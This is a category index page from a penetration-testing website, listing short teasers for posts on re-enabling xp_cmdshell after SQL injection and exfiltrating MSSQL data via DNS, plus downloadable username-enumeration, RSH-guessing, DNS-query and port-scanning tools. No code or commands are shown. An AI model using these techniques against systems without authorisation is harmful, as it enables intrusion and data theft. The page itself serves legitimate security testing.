pentest

Enabling xp_cmdshell for SQL Server 2005

It’s disappointing to exploit a SQL injection, find you’re “sa”, then realise they’ve disabled xp_cmdshell (the default for MSSQL 2005). Fortunately, it’s possible to re-enable it quite easily…

Blog mssql, pentest, sqlinjection, 0

Exfiltrating Data From MS SQL Server Via DNS

Exfiltrating data via Blind SQL Injection vulnerabilities can be slow, or the very least undesirably noisy. DNS may provide a faster alternative if the target system is connected to the Internet.

Blog dns, mssql, pentest, sqlinjection, 0

Preventing Web-based Directory Enumeration Attacks

Here are some thoughts on how to prevent directory-name guessing (e.g. checking for http://host/admin, http://host/private, etc.).

Blog pentest, 0

ftp-user-enum

Username guessing tool for use against the default Solaris ftp service and GNU inetutils ftpd. Recent changes are detailed in the CHANGELOG. Download ftp-user-enum v1.0 here. SHA1sum: 2fbd86dba9f701627d415ed76100b2768b271862 MD51sum: c19ec3eb1eab6282a16514b51eb5f1c6 User documentation are also avaialble in PDF format.

User Enumeration ftpuserenum, pentest, tool, userenumeration, 0

finger-user-enum

Username guessing tool primarily for use against the default Solaris finger service. Also supports relaying of queries through another finger server. Recent changes are detailed in the CHANGELOG. Download finger-user-enum v1.0 here. SHA1sum: 017e214e786df5a25336291acd3b9c8a46b3bd7b MD51sum: f18832f9d2b5210e5f51bd89f44abeee User documentation is also available in PDF format.

User Enumeration fingeruserenum, pentest, tool, userenumeration, 0

smtp-user-enum

Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO. Recent changes are detailed in the CHANGELOG. Download smtp-user-enum v1.2 here. MD5 and SHA1 checksums are the packages can be downloaded. They’re based on the package name (below v.v represents the version, e.g. 1.1): http://pentestmonkey.net/tools/smtp-user-enum/smtp-user-enum-v.v-beta.tar.gz.md5 […]

User Enumeration pentest, smtpuserenum, tool, userenumeration, 0

rsh-grind

Basically tries lots of combinations of local and remote usernames to execute commands via RSH. Download SHA1sum: f1b37abb6ad54df775c1cf194ab91fd41d607f1f MD5sum: 2ecae8730f89c697f2512181ded3842f User documentation is also available in PDF format.

Misc pentest, rshgrind, unix, 0

dns-grind

Tool for performing lots of DNS queries quickly. Download dns-grind v1.0 here. SHA1sum: db2beb7ca6caf4343f81936d78617f02b87da024 MD5sum: f145a5acf5cc53507d9be147adbe384e User documentation is also available in PDF format.

Misc discover, dns, dnsgrind, domain, enumerate, fast, host, hostname, ip, nameserver, ns, pentest, ptr, query, scan, tool, 0

yapscan

TCP Half-open port scanner / fast ICMP scanner. Some limited support for UDP scans too. It’s beta, but still kinda useful. Download Yapscan v0.7.4-beta as tar.gz. Recent changes are detailed in the CHANGELOG. Update: You’re better off using the SVN copy on google code. It’s more up to date. MD5 and SHA1 checksums are the […]

Misc pentest, Tools, yapscan, 0

A Penetration Testing Site

The pentestmonkey website is under heavy construction right now. Eventually I hope to fill it with tools to take some of the monkey work out of pentesting. Check out the collection so far. The tools are all released under the terms of the GPL, so you’re free to use them for commercial or non-commercial purposes, […]

Site News enumerate, free, hacking, opensource, penetration, pentest, scan, security, test, Tools, 0

pentest

Categories